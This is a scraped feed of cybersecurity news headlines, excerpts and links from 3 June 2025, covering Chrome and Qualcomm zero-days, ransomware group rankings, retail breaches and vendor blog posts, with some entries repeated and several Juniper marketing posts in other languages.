2025-06-03T21:23:55Z | 1748985835

LayerX Launches ExtensionPedia

https://www.darkreading.com/endpoint-security/layerx-launches-extensionpedia
TXOne Networks Introduces Capability for Intelligent Vulnerability Mitigation
2025-06-03T21:18:11Z | 1748985491

TXOne Networks Introduces Capability for Intelligent Vulnerability Mitigation

https://www.darkreading.com/ics-ot-security/txone-networks-intelligent-vulnerability-mitigation
'Crocodilus' Sharpens Its Teeth on Android Users
2025-06-03T21:08:04Z | 1748984884

The data-stealing malware initially targeted users in Turkey but has since evolved into a global threat.

https://www.darkreading.com/mobile-security/crocodilus-sharpens-teeth-android-users
Smart Cars, Dumb Passwords: Auto Industry Still Runs on Weak Passwords
2025-06-03T21:00:26Z | 1748984426

A new study by NordPass and NordStellar reveals the automotive industry is plagued by weak, reused, and common…

https://hackread.com/smart-cars-dumb-passwords-auto-industry-weak-passwords/
Retail Under Siege
2025-06-03T20:53:07Z | 1748983987

Why Security Fundamentals Matter More Than Ever   Victoria’s Secret became the latest high-profile retailer to fall victim to a cyberattack, joining a growing list of brands reeling from data breaches....

https://www.firemon.com/blog/retail-under-siege/
Chromium: CVE-2025-5068 Use after free in Blink
2025-06-03T20:50:16Z | 1748983816

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5068
Chromium: CVE-2025-5419 Out of bounds read and write in V8
2025-06-03T20:50:13Z | 1748983813

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information. Google is aware that an exploit for CVE-2025-5419 exists in the wild.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5419
Dynamic, Context-Aware Security with AI-Driven Zero Trust
2025-06-03T20:38:43Z | 1748983123

Introduction to AI-Driven Zero Trust The current cybersecurity landscape demands a shift from traditional static access controls to dynamic, context-aware security models. AI-driven Zero Trust frameworks harness the power of artificial intelligence to revolutionize network access management. By continuously analyzing user behavior, device posture, and contextual factors, these systems provide real-time, adaptive security. This approach… The post Dynamic, Context-Aware Security with AI-Driven Zero Trust appeared first on Portnox.

https://www.portnox.com/blog/zero-trust/dynamic-context-aware-security-with-ai-driven-zero-trust/
OT Cybersecurity Best Practices for SMBs: How to Disconnect Your IT, DMZ, and OT from Each Other & What to Consider
2025-06-03T20:09:09Z | 1748981349

This blog is part of a blog series detailing best practices for operational technology (OT) cybersecurity for under-resourced organizations by... The post OT Cybersecurity Best Practices for SMBs: How to Disconnect Your IT, DMZ, and OT from Each Other & What to Consider first appeared on Dragos.

https://www.dragos.com/blog/ot-cybersecurity-best-practices-for-smbs-how-to-disconnect-your-it-dmz-and-ot-from-each-other-what-to-consider/
Victoria's Secret Delays Earnings Call Due to Cyber Incident
2025-06-03T20:00:17Z | 1748980817

But that didn't stop the clothing retailer from issuing preliminary results for the first quarter of 2025.

https://www.darkreading.com/vulnerabilities-threats/victorias-secret-delays-earnings-cyber-incident
Qualcomm security advisory – June 2025 monthly rollup (AV25-315)
2025-06-03T19:46:52Z | 1748980012

https://cyber.gc.ca/en/alerts-advisories/qualcomm-security-advisory-june-2025-monthly-rollup-av25-315
Google addresses 34 high-severity vulnerabilities in June’s Android security update
2025-06-03T19:35:17Z | 1748979317

The most serious flaw in the monthly security update affects the Android system and could be exploited to achieve local escalation of privilege, the company said. The post Google addresses 34 high-severity vulnerabilities in June’s Android security update appeared first on CyberScoop.

https://cyberscoop.com/android-security-update-june-2025/
Google addresses 34 high-severity vulnerabilities in June’s Android security update
2025-06-03T19:35:17Z | 1748979317

The most serious flaw in the monthly security update affects the Android system and could be exploited to achieve local escalation of privilege, the company said. The post Google addresses 34 high-severity vulnerabilities in June’s Android security update appeared first on CyberScoop.

https://cyberscoop.com/android-security-update-june-2025/
Google quietly pushes emergency fix for Chrome 0-day as exploit runs wild
2025-06-03T19:23:09Z | 1748978589

TAG team spotted the V8 bug first, so you can bet nation-states weren’t far behind Google revealed Monday that it had quietly deployed a configuration change last week to block active exploitation of a Chrome zero-day.

https://go.theregister.com/feed/www.theregister.com/2025/06/03/google_chrome_zero_day_emergency_fix/
Chrome Drops Trust for Chunghwa, Netlock Certificates
2025-06-03T19:04:19Z | 1748977459

Digital certificates authorized by the authorities will no longer have trust by default in the browser starting in August, over what Google said is a loss of integrity in actions by the respective companies.

https://www.darkreading.com/remote-workforce/chrome-drops-trust-chunghwa-netlock-certificates
Android chipmaker Qualcomm fixes three zero-days exploited by hackers
2025-06-03T18:59:57Z | 1748977197

Google's Threat Analysis Group, which investigates government-backed hacks, was credited with the discovery of the zero-days.

https://techcrunch.com/2025/06/03/phone-chipmaker-qualcomm-fixes-three-zero-days-exploited-by-hackers/
LummaC2 Fractures as Acreed Malware Becomes Top Dog
2025-06-03T18:40:02Z | 1748976002

LummaC2 formerly accounted for almost 92% of Russian Market's credential theft log alerts. Now, the Acreed infostealer has replaced its market share.

https://www.darkreading.com/remote-workforce/lummac2-fractures-acreed-malware-top-dog
Google is ‘all in’ on government business
2025-06-03T18:30:00Z | 1748975400

The company’s cloud offering for government customers achieved more important security milestones last week, allowing it’s tech tools to be used in the most sensitive, classified environments.

https://www.nextgov.com/acquisition/2025/06/google-all-government-business/405769/
X's new 'encrypted' XChat feature seems no more secure than the failure that came before it
2025-06-03T18:02:08Z | 1748973728

Musk's 'Bitcoin-style encryption' claim has experts scratching their heads Elon Musk's X social media platform is rolling out a new version of its direct messaging feature that the platform owner said had a "whole new architecture," but as with many a Muskian proclamation, there's reason to doubt what's been said. 

https://go.theregister.com/feed/www.theregister.com/2025/06/03/xs_new_encrypted_xchat_feature/
What is NetFlow? A 2025 Overview
2025-06-03T18:00:00Z | 1748973600

Network infrastructure generates a constant stream of IP traffic, and understanding how that traffic moves is essential for maintaining performance, availability, and security. NetFlow is a protocol designed to capture metadata about these traffic flows, offering a structured way to monitor activity across routers, switches, and other Layer 3 devices.  This blog explores how NetFlow works, the components involved in its deployment, and the types of... Read more » The post What is NetFlow? A 2025 Overview appeared first on Plixer.

https://www.plixer.com/blog/what-is-netflow-2025/
Trump budget wants agencies to contribute unobligated funds to TMF
2025-06-03T17:58:00Z | 1748973480

Here is what the budget request includes for the Technology Modernization Fund, Federal Citizen Services Fund and more.

https://www.nextgov.com/modernization/2025/06/trump-budget-wants-agencies-contribute-unobligated-funds-tmf/405766/
Google Chrome security advisory (AV25-314)
2025-06-03T17:42:07Z | 1748972527

https://cyber.gc.ca/en/alerts-advisories/google-chrome-security-advisory-av25-314
Crooks fleece The North Face accounts with recycled logins
2025-06-03T17:39:24Z | 1748972364

Outdoorsy brand blames credential stuffing Joining the long queue of retailers dealing with cyber mishaps is outdoorsy fashion brand The North Face, which says crooks broke into some customer accounts using login creds pinched from breaches elsewhere.

https://go.theregister.com/feed/www.theregister.com/2025/06/03/north_face_credential_stuffing/
Code Bug at Compliance Firm Vanta Leaks Customer Data to Other Clients
2025-06-03T17:22:56Z | 1748971376

Compliance automation provider Vanta confirms a software bug exposed private customer data to other users, impacting hundreds of…

https://hackread.com/code-bug-compliance-vanta-data-leak-customer-clients/
Announcing Our New Upskilling Playbook
2025-06-03T17:00:40Z | 1748970040

UpSkill America’s new Upskilling Playbook is a strategic guide for organizations to build, scale, and integrate skills-based workforce development initiatives that drive business performance and career growth. The post Announcing Our New Upskilling Playbook appeared first on The Aspen Institute.

https://www.aspeninstitute.org/videos/announcing-our-new-upskilling-playbook/
Cyber Criminals Defraud Hedera Hashgraph Network Non-Custodial Wallet Users Through Nonfungible Token Airdrops Disguised as Free Rewards
2025-06-03T17:00:00Z | 1748970000

Cyber Criminals Defraud Hedera Hashgraph Network Non-Custodial Wallet Users Through Nonfungible Token Airdrops Disguised as Free Rewards

https://www.ic3.gov/PSA/2025/PSA250603
The Worsening Landscape of Educational Cybersecurity
2025-06-03T16:56:04Z | 1748969764

Last year, KnowBe4's report "Exponential Growth in Cyber Attacks Against Higher Education Institutions" illustrated the growing cyber threats facing universities and colleges.

https://blog.knowbe4.com/the-worsening-landscape-of-educational-cybersecurity
New Unrestricted AI Tool Can Assist in Cybercrime
2025-06-03T16:55:33Z | 1748969733

Researchers at Certo warn that a new AI chatbot called “Venice[.]ai” can allow cybercriminals to easily generate phishing messages or malware code.

https://blog.knowbe4.com/new-unrestricted-ai-tool-can-assist-in-cybercrime
SafePay, DevMan Emerge as Major Ransomware Threats
2025-06-03T16:53:13Z | 1748969593

SafePay’s journey to the top of the ransomware leaderboard was a quick one. The SafePay ransomware group first emerged in the fall of 2024, and last month took the top spot among ransomware groups in the number of victims claimed on their data leak site, according to a Cyble blog post published today. Cyble reported that ransomware groups claimed 384 victims in May, a number that may rise somewhat as all data is processed. That’s the third straight monthly decline for claimed victims, as new leaders continue to emerge after RansomHub – the top ransomware group for more than a year – went offline in late March in a possible attack by rival DragonForce. Cyble also looked at DevMan, another emerging ransomware threat, and other ransomware developments that occurred in May. Top Ransomware Groups and Threats SafePay claimed 58 victims in May to take over the top spot from April leader Qilin, which came in second with 54 victims. Play, Akira and NightSpire rounded out the top five ransomware groups. The U.S. was once again the most targeted country, with 181 victims (charts below from Cyble). [caption id="attachment_103123" align="aligncenter" width="936"] Top ransomware groups May 2025[/caption] [caption id="attachment_103124" align="aligncenter" width="936"] Ransomware attacks by country May 2025[/caption] Professional Services and Construction were the most attacked sectors by all ransomware groups, totaling 101 attacks, followed by Manufacturing, Government, Healthcare, Finance, IT, Transportation, Consumer Goods and Education, Cyble said. SafePay has claimed 198 victims to date. The group’s previous monthly high was 43 victims in March, but May was the first month that SafePay led all ransomware groups. Cyble said SafePay typically obtains initial access to victim environments through VPN and RDP connections, often using stolen credentials or password spraying attacks. The group uses double-extortion techniques – encrypting and threatening to publicly release data – and claims not to offer Ransomware-as-a-Service (RaaS), unlike other ransomware groups that rely on affiliates to spread their malware. Major targets for SafePay include the U.S. and Germany, as well as the Professional Services, Construction, Healthcare, Education and Manufacturing sectors. DevMan, meanwhile, mainly operates as an affiliate of several RaaS groups, but was recently observed deploying its own ransomware that the group claims is capable of faster lateral movement and is implemented via Group Policy Object (GPO). DevMan claimed 13 victims in May, placing it just outside the top five ransomware groups, “and making it one to watch,” Cyble said. As an affiliate, DevMan has worked with Qilin, Apos, DragonForce RaaS and RansomHub. In another significant ransomware development in May, the leak of the VanHelsing Ransomware-as-a-Service (RaaS) source code raises “concerns of potential copycat operations, as observed following the leaks of LockBit and Babuk,” Cyble said. “The widespread availability of VanHelsing’s source code may accelerate the emergence of new ransomware variants in the coming weeks." Cyble also detailed three new ransomware groups, as well as 17 ransomware attacks claimed by ransomware groups, many of which could have significant impact on the software supply chain, critical infrastructure and even military targets. Protecting Against Ransomware Cyble said the rise of new ransomware groups to take the place of former leaders “underscores the ever-present threat of ransomware and highlights the enduring importance of cybersecurity best practices for protecting against a wide range of cyber threats.” Those cybersecurity best practices include a risk-based vulnerability management program; protecting exposed assets; segmenting networks and critical assets; creating ransomware-resistant backups; applying Zero Trust principles; practicing proper configuration and secrets protection; hardening endpoints and infrastructure; and monitoring networks, endpoints and cloud environments.

https://thecyberexpress.com/safepay-devman-emerging-ransomware-threats/
The CEO Database Exposes Information on Over 1,000 Executives
2025-06-03T16:46:47Z | 1748969207

In this post, we delve into the emergence of The CEO Database, analyzing the escalated threat it poses to executive protection—from doxxing to sophisticated AI-powered phishing and deepfake campaigns. The post The CEO Database Exposes Information on Over 1,000 Executives appeared first on Flashpoint.

https://flashpoint.io/blog/ceo-database-exposes-information-on-executives/
Alleged sale of WoW Health database – 423,650 Customer Records Exposed
2025-06-03T16:43:30Z | 1748969010

Alleged sale of WoW Health database – 423,650 Customer Records Exposed

https://darkwebinformer.com/alleged-sale-of-wow-health-database-423-650-customer-records-exposed/
Hack the model: Build AI security skills with the GitHub Secure Code Game
2025-06-03T16:37:03Z | 1748968623

Dive into the novel security challenges AI introduces with the open source game that over 10,000 developers have used to sharpen their skills. The post Hack the model: Build AI security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.

https://github.blog/security/hack-the-model-build-ai-security-skills-with-the-github-secure-code-game/
Hack the model: Build AI security skills with the GitHub Secure Code Game
2025-06-03T16:37:03Z | 1748968623

Dive into the novel security challenges AI introduces with the open source game that over 10,000 developers have used to sharpen their skills. The post Hack the model: Build AI security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.

https://github.blog/security/hack-the-model-build-ai-security-skills-with-the-github-secure-code-game/
K58243048: Considerations for transferring files from F5 devices
2025-06-03T16:36:55Z | 1748968615

Security Advisory Description The BIG-IP system uses Secure Vault, a secure SSL-encrypted storage system, to securely store sensitive data such as SSL key passphrases, users, and administrator and ...

https://my.f5.com/manage/s/article/K58243048
CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
2025-06-03T16:28:53Z | 1748968133

Wild variances in naming taxonomies aren’t going away, but a new initiative from the security vendors aims to more publicly address obvious overlap in threat group attribution. The post CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution appeared first on CyberScoop.

https://cyberscoop.com/crowdstrike-microsoft-threat-group-attribution-initiative/
CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
2025-06-03T16:28:53Z | 1748968133

Wild variances in naming taxonomies aren’t going away, but a new initiative from the security vendors aims to more publicly address obvious overlap in threat group attribution. The post CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution appeared first on CyberScoop.

https://cyberscoop.com/crowdstrike-microsoft-threat-group-attribution-initiative/
Pennsylvania School District Adopts AI-Driven Gun Detection Technology
2025-06-03T16:26:59Z | 1748968019

Pennsylvania’s South Williamsport Area School District (SWASD) has announced it is deploying an AI-based gun detection technology.

https://www.securitymagazine.com/articles/101665-pennsylvania-school-district-adopts-ai-driven-gun-detection-technology
Identifying risks for an internal data breach within unstructured data
2025-06-03T16:23:18Z | 1748967798

An internal data breach is the exposure of confidential information to an unauthorized user in an organization. We tend to think of confidential information as private information about a patient, customer, employee, etc. After all, nearly every country in the world has regulations specifying how private data can be stored, accessed, and managed. And, they can assess sizeable fines for noncompliance.  Organizations typically store personal identifiable information (PII) as records in an application database. A patient’s medical information, for example, is structured across cells in a medical application’s database table. This is why it known as “structured data.”   Protect your unstructured data But sensitive information is not just PII; it also includes an organization’s confidential or competitive proprietary data. For example, not-yet-released quarterly sales results, future marketing plans, legal documents, and more. These word processing files, spreadsheets, presentations, media files, etc., cannot be structured in a database. They are stored in folders in a network file system or in the cloud. This type of data is known as “unstructured data.” It comprises about 80 percent of an organization’s total stored data.  Organizations largely protect and manage structured data from unauthorized access through an automated process. An example is an identity and access management system (IAM) that provisions and restricts access based on user identity and role. Conversely, they will secure unstructured data through NTFS permissions assignments in Microsoft Active Directory and Microsoft Entra ID for network folders, shares, and document libraries. NTFS permissions increase the complexity of protecting unstructured data It’s these extensive and complex individual NTFS permissions assignments that can be so challenging to manage. Sure, a network administrator can check which groups, and associated members can access a specific folder by viewing the folder properties. But with potentially thousands of folders, subfolders, and document libraries storing files with confidential, sensitive, and high-value data, reviewing these permissions individually is impractical.  How OpenText can help That’s where OpenText File Reporter, a component of OpenText Data Access Governance, comes in. It has extensive reporting and analytics capabilities. File Reporter can identify all users who can access individual folders, subfolders, Microsoft 365 document libraries, their NTFS permissions. It can also identify how that access is derived. With these findings, information and security officers, network administrators, and department data owners can determine potential risks for internal data breaches.    OpenText File Reporter can present these findings in a variety of permissions report types. That way you can have the information you need to make the necessary changes to access permissions.  This capability has been incredibly useful to customers needing to perform regular vulnerability assessments on all of their confidential, sensitive, and high-value unstructured data and protect themselves from everything from inappropriate insider knowledge to insider misconduct.  With so much to lose – data security, competitive advantages, customers, employees, and reputation, as well as the potential for fines and lawsuits, organizations cannot risk the possibility of an internal data breach, especially when those risks are so easy to identify with OpenText File Reporter.  The post Identifying risks for an internal data breach within unstructured data appeared first on OpenText Blogs.

https://blogs.opentext.com/identifying-risks-for-an-internal-data-breach-within-unstructured-data/
How the Farm Industry Spied on Animal Rights Activists and Pushed the FBI to Treat Them as Bioterrorists
2025-06-03T16:21:20Z | 1748967680

For years, a powerful farm industry group served up information on activists to the FBI. Records reveal a decade-long effort to see the animal rights movement labeled a “bioterrorism” threat.

https://www.wired.com/story/fbi-wmdd-dxe-animal-agriculture-alliance/
Trump is planning to slash 107,000 federal jobs next year. See where
2025-06-03T16:03:00Z | 1748966580

New details in the president's budget detail some of the proposed workforce reductions, though the final cuts will likely be steeper.

https://www.nextgov.com/people/2025/06/trump-planning-slash-107000-federal-jobs-next-year-see-where/405762/
DNS rebinding attacks explained: The lookup is coming from inside the house!
2025-06-03T16:00:00Z | 1748966400

DNS rebinding attack without CORS against local network web applications. Explore the topic further and see how it can be used to exploit vulnerabilities in the real-world. The post DNS rebinding attacks explained: The lookup is coming from inside the house! appeared first on The GitHub Blog.

https://github.blog/security/application-security/dns-rebinding-attacks-explained-the-lookup-is-coming-from-inside-the-house/
DNS rebinding attacks explained: The lookup is coming from inside the house!
2025-06-03T16:00:00Z | 1748966400

DNS rebinding attack without CORS against local network web applications. Explore the topic further and see how it can be used to exploit vulnerabilities in the real-world. The post DNS rebinding attacks explained: The lookup is coming from inside the house! appeared first on The GitHub Blog.

https://github.blog/security/application-security/dns-rebinding-attacks-explained-the-lookup-is-coming-from-inside-the-house/
How Microsoft Defender for Endpoint is redefining endpoint security
2025-06-03T16:00:00Z | 1748966400

Learn why many CISOs prefer Microsoft Defender for Endpoint for comprehensive cyberthreat protection across devices and platforms. The post How Microsoft Defender for Endpoint is redefining endpoint security appeared first on Microsoft Security Blog.

https://www.microsoft.com/en-us/security/blog/2025/06/03/how-microsoft-defender-for-endpoint-is-redefining-endpoint-security/
K12201527: Overview of Quarterly Security Notifications
2025-06-03T15:58:30Z | 1748966310

Security Advisory Description F5 discloses security vulnerabilities and security exposures for F5 products in Quarterly Security Notifications (QSNs). The dates of future QSNs are published in ...

https://my.f5.com/manage/s/article/K12201527
Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing
2025-06-03T15:46:59Z | 1748965619

The letter to Senate Homeland Security and Governmental Affairs Committee leaders comes shortly before they consider his nomination. The post Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing appeared first on CyberScoop.

https://cyberscoop.com/sean-cairncross-national-cyber-director-endorsement/
Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing
2025-06-03T15:46:59Z | 1748965619

The letter to Senate Homeland Security and Governmental Affairs Committee leaders comes shortly before they consider his nomination. The post Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing appeared first on CyberScoop.

https://cyberscoop.com/sean-cairncross-national-cyber-director-endorsement/
转向瞻博网络数据中心网络的八大理由
2025-06-03T15:46:10Z | 1748965570

Official Juniper Networks Blogs 转向瞻博网络数据中心网络的八大理由  如今的数据中心网络炙手可热,无论从哪个方面来看,瞻博网络都是这一领域最热门的供应商。但为什么是现在呢?又为什么是瞻博网络呢?   首先,是什么原因使得这个领域如此受青睐?最主要的原因当然是 AI。AI 正推动组织在 AI 数据中心进行大量新的投资,以应对 AI 工作负载模型训练和推理所需的高容量和严苛性能要求。    近年来,传统数据中心的火热程度也更胜以往,导致这种情况的原因至少有两个。第一个原因是 AI 的溢出效应:AI 不仅推动各组织扩建特殊用途的 AI 数据中心,而且带动了托管所有传统应用的“前端”数据中心流量的增加。    第二个原因是对公共云的抵制:面对高昂的云成本和供应商锁定问题,那些曾经认为可以将几乎所有东西都迁移到公共云的组织已经改变了方向。现在的形势非常明朗,即在可预见的未来,混合模式将成为主流趋势,相当一部分的企业工作负载将会留在私有云中。这意味着企业必须继续加大对私有数据中心的投资,并进行现代化改造,打造既能满足业务需求又兼具自动化能力的敏捷私有云基础架构。   这也解释了数据中心网络市场为什么如此受青睐。     但为什么说瞻博网络是最热门的供应商呢?   我们给出了 8 个理由:       1. 瞻博网络获评为2025 年 Gartner® 数据中心交换Magic Quadrant™领导者。这是一条最新的消息,但对我们来说,却是历经了时间的验证。我们认为,火热的市场对独立分析数据中心网络解决方案提出了更高的要求,因此 Gartner The post 转向瞻博网络数据中心网络的八大理由  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/zh-cn/chinese-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-cn
Indian grocery startup KiranaPro was hacked and its servers deleted, CEO confirms
2025-06-03T15:46:06Z | 1748965566

The company said the cyberattack destroyed its servers and customer data.

https://techcrunch.com/2025/06/03/indian-grocery-startup-kiranapro-was-hacked-and-its-servers-deleted-ceo-confirms/
Cybersecurity Challenges in the Energy and Utilities Sector
2025-06-03T15:41:54Z | 1748965314

IBM and Palo Alto Networks are collaborating to address five key security challenges and their solutions. The post Cybersecurity Challenges in the Energy and Utilities Sector appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/06/cybersecurity-challenges-energy-utilities-sector/
주니퍼 데이터센터 네트워킹으로 전환해야 하는 8가지 이유
2025-06-03T15:40:21Z | 1748965221

Official Juniper Networks Blogs 주니퍼 데이터센터 네트워킹으로 전환해야 하는 8가지 이유  데이터센터 네트워킹은 뜨거운 분야이며, 주니퍼는 여러 측면에서 이 분야에서 가장 인기 있는 벤더입니다. 그렇다면 지금 데이터센터 네트워킹이 화제인 이유는 무엇일까요? 그리고 왜 주니퍼가 주목받고 있을까요?   일단 이 분야가 이렇게 화제가 The post 주니퍼 데이터센터 네트워킹으로 전환해야 하는 8가지 이유  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/ko-kr/korean-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-kr
FDA unveils ‘Elsa’ generative AI tool for staff
2025-06-03T15:33:00Z | 1748964780

Following a successful pilot, the Food and Drug Administration unveiled its in-house large language model designed to help agency staff in drug clinical evaluations and reviews.

https://www.nextgov.com/artificial-intelligence/2025/06/fda-unveils-elsa-generative-ai-tool-staff/405761/
Trump’s cyber nominees gain broad industry support
2025-06-03T15:28:00Z | 1748964480

CISA director and national cyber director nominees could transform how the federal government engages with the private sector on cybersecurity issues.

https://www.cybersecuritydive.com/news/trump-cyber-sean-plankey-cairncross-nominees-endorsements/749663/
Trump’s cyber nominees gain broad industry support
2025-06-03T15:28:00Z | 1748964480

CISA director and national cyber director nominees could transform how the federal government engages with the private sector on cybersecurity issues.

https://www.cybersecuritydive.com/news/trump-cyber-sean-plankey-cairncross-nominees-endorsements/749663/
Threat Modeling Checklist for Mobile App Development | Appknox
2025-06-03T15:21:19Z | 1748964079

As mobile apps become increasingly central to business operations and user engagement, securing them from design to deployment has never been more critical. Threat modeling offers an essential first step in identifying and mitigating potential security risks early in the development process. It helps you think like an attacker, spotting weaknesses before they can be exploited.

https://www.appknox.com/blog/threat-modeling-checklist-for-mobile-app-development
ジュニパーのデータセンターネットワークに切り替える8つの理由
2025-06-03T15:19:32Z | 1748963972

Official Juniper Networks Blogs ジュニパーのデータセンターネットワークに切り替える8つの理由  データセンターネットワークは現在最も注目を集めている分野であり、多くの指標によれば、ジュニパーはこの分野で最も注目されるベンダーです。なぜ今注目を集めており、なぜジュニパーなのでしょうか?   まず、この分野がなぜこれほど注目されているのかを見てみましょう。最大の理由は、もちろんAIです。AIは、モデルトレーニングと推論の両方において高容量かつ高性能なAIワークロードを必要とするため、AIデータセンターへの大規模な新規投資を後押しします。    また、従来のデータセンターも、少なくとも2つの理由から、ここ数年でさらに注目を集めています。第1に、AIによる波及効果です。AIは、専用のAIデータセンターの構築を促すだけでなく、従来型のアプリケーションがすべてホストされている「フロントエンド」データセンターにおいても、トラフィックの増加を引き起こしています。    第2に、パブリッククラウドに対する見直しの動きです。ほぼすべてのものをパブリッククラウドに移行できると考えていた企業は、高騰するクラウドコストやベンダーロックインのリスクに直面し、戦略の見直しを迫られています。今後しばらくの間、ハイブリッド環境が主流になることは明らかであり、企業のワークロードの大多数がプライベートクラウドにとどまると考えられます。つまり、企業は引き続きプライベートデータセンターへの投資を行い、その最新化を進めて、ビジネスニーズに常時対応できる自動化された俊敏なプライベートクラウドインフラストラクチャを構築しなければなりません。   以上が、データセンターネットワーク市場が現在活況を呈している理由です。    では、ジュニパーが最も注目されているベンダーとなっている理由は何でしょうか?   私たちは、その理由は8つあると考えています。  ジュニパーネットワークスは、2025年度の「Gartner® Magic Quadrant™ for Data Center Switching」においてリーダーの1社に位置づけられました。これは最新のニュースですが、私たちにとっては長らく待ち望んでいた成果です。私たちは、急成長するこの市場において、データセンターネットワークソリューションに関する客観的な分析へのニーズが高まっていると考えています。そうした中から、Gartnerは今回初めて、データセンタースイッチング分野におけるMagic Quadrantを発表しました。ジュニパーがリーダーの1社として評価されたことは、ジュニパーがきわめて活況を呈しているこの分野において最も注目されるベンダーであることを示す、もう1つの確かな証拠であると私たちは捉えています。  ジュニパーネットワークスは、「Gartner Critical Capabilities for Data Center Switching」レポートにおいて、3つのユースケースのうち、エンタープライズデータセンターネットワークビルドアウトの分野で最高スコア、AIイーサネットファブリックビルドアウトの分野で第2位のスコアと評価されています。Critical CapabilitiesレポートはMagic Quadrantを補完するものであり、ベンダーの製品やソリューションに重点を置いた評価を行います。この評価は、ジュニパーが長年にわたり最高のデータセンターソリューションの構築に投資を行ってきたこと、そして800GスイッチングやAIデータセンターの分野での最近のリーダーシップが実を結んでいることの証しだと、私たちは考えています。ジュニパーのお客様は、すでにこうした状況を実感していました。今や、その価値を世界中が認めつつあります。 インサイトの向上 どれほど信頼性の高いデータセンターネットワークであっても、現実には予期しない問題が発生します。そのため、NetOps(ネットワーク運用)チームには、ネットワークおよびアプリケーションの問題を事前対応で迅速に検出し解決するためのツールが不可欠です。ジュニパー独自のアーキテクチャの利点は、他では得られないインサイトを得られることです。Juniper Apstra™コンテキストグラフは、ネットワークとアプリケーションのフローデータを統合し、Mist AIネイティブネットワーキングプラットフォームで構築された業界をリードするAIOpsツールと連携します。これにより、ネットワーク上のアプリケーションに対する予測的なインサイトが得られ、ネットワークの問題がアプリケーションのパフォーマンスやエンドユーザーエクスペリエンスに与える影響などを把握できます。NetOpsチームは、こうした問題を事前対応的に解決できるようになります。実際にジュニパーのお客様は、ネットワークアラーム件数の大幅な削減、トラブルシューティングに要する時間の短縮、アプリケーション認識、根本的原因分析および影響分析の機能の大幅な向上といった成果を実感しています。 最高速度の実現 ジュニパーは、Day 0の計画段階からDay 2以降の運用フェーズまで、データセンターのライフサイクル全体にわたって自動化を実現し、これによってあらゆるフェーズが迅速化します。Day 0では、スイッチングハードウェアの導入と同時にサービス開始が可能なソフトウェアベースの完全なデータセンター「デジタルツイン」を構築できる設計ツールをお客様に提供します。これにより、数週間かかっていたサービス開始までの期間を、数時間にまで短縮できます。このようなツールは、他のベンダーでは提供されていません。また、Day 2のプロビジョニングにおいても、Juniper Apstraを活用することで、従来の手法に比べてはるかに迅速な実施が可能になります。サービスプロビジョニングに要する時間が数時間からわずか数分へと最大20分の1に短縮されたお客様もいます。これにより、このお客様は煩雑な設定作業から解放され、ビジネスニーズを満たすサービスを提供することに集中できるようになりました。 強固な信頼性 データセンターネットワークにおける信頼性は、ミッションクリティカルなアプリケーションの高可用性要件を満たすために不可欠です。そして、ダウンタイムの最大の原因の1つが「ヒューマンエラー」です。CLIコマンドの入力ミス、現在のネットワーク構成が反映されない未更新の自動化スクリプト、一時的な対処のために追加されたまま放置されている設定など、手動によるプロセスには多くの落とし穴があり、こうした要因はデータセンターの停止やパフォーマンスの低下を引き起こします。ジュニパーのインテントベースの自動化は、こうした手動によるミスを基本的にすべて排除します。インテントに基づいてベンダー固有の適切な構成を自動生成し、数十に及ぶ妥当性チェックを通じてすべての変更を事前に検証し、リアルタイムで継続的なインテント検証を実施します。これにより、ネットワークの稼働状態がインテント通りであることを確認し、不一致があれば迅速に修正できます。これほどの機能を提供できる企業は、業界内の他のベンダーにはいません。 信頼性も、前述したスピードの優位性を実現するうえで重要な要素です。自動化プラットフォームが完全に検証された構成を提供し、ミスを排除していると信頼できなければ、新しいサービスを迅速に、安心して提供することはできません。ある大手電力インフラ事業者は、サービス変更を信頼できる形で迅速に適用するにあたっては、ジュニパーのソフトウェアが信頼に値すると判断しました。その結果、メンテナンスのスケジュールを組み、ビジネスに必要なサービスの提供を待機する必要がなくなりました。  The post ジュニパーのデータセンターネットワークに切り替える8つの理由  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/ja-jp/japanese-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-jp
Email spoofing attacks are still a major threat for FTSE 100 companies – despite a simple fix being widely available
2025-06-03T15:15:00Z | 1748963700

Improper configuration of DMARC and other email authentication protocols opens organizations to major threats

https://www.itpro.com/security/email-spoofing-attacks-are-still-a-major-threat-for-ftse-100-companies-despite-a-simple-fix-being-widely-available
Splunk security advisory (AV25-313)
2025-06-03T15:14:04Z | 1748963644

https://cyber.gc.ca/en/alerts-advisories/splunk-security-advisory-av25-313
8 motivos incríveis para mudar para as redes de data center da Juniper
2025-06-03T15:10:26Z | 1748963426

Official Juniper Networks Blogs 8 motivos incríveis para mudar para as redes de data center da Juniper  As redes de data são o assunto do momento, e, segundo inúmeros critérios, a Juniper é o fornecedor mais relevante neste espaço. Por que agora? E por que a Juniper?   The post 8 motivos incríveis para mudar para as redes de data center da Juniper  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/pt-br/portuguese-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-ptbr
Fake Docusign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack
2025-06-03T15:00:00Z | 1748962800

